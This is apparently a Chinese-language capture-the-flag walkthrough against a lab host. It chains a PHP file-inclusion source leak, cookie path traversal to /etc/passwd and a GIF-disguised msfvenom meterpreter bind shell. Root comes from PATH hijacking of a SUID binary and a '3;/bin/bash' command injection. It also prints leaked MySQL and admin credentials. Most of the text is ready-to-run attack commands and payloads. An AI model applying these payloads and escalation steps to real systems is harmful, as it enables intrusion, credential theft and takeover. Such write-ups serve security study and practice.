文件包含漏洞获得所有php源码http://192.168.108.3/?page=php://filter/read=convert.base64-encode/resource=config
获得mysql口令root:H4u%QJ_H99，远程连接3306后获得数据表中的后台口令kent:JWzXuBJJNy，mike:SIfdsTEn6I，kane:iSv5Ym2GRo
修改Cookie: lang=../../../../../etc/passwd，也可以利用这个文件包含漏洞包含图片木马，用msf进行正向连接
echo GIF89a > kali.gif
msfvenom -p php/meterpreter/bind_tcp LPORT=4444 R >>kali.gif
curl --cookie "lang=../upload/51c65dd716e81189745d6eb1c9f1bb6b.gif" "http://192.168.108.3"
经过尝试，su kane之后发现msgmike程序带suid，用IDA逆向发现它调用cat命令，可以替换环境变量，伪造一个cat为/bin/bash，就能以mike身份执行/bin/bash
echo "/bin/bash" > cat
chmod 777 cat
export PATH=/home/kane
./msgmike
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
又发现msg2root程序带suid，用IDA逆向发现命令注入漏洞，可以输入3;/bin/bash，成功提权得到flag
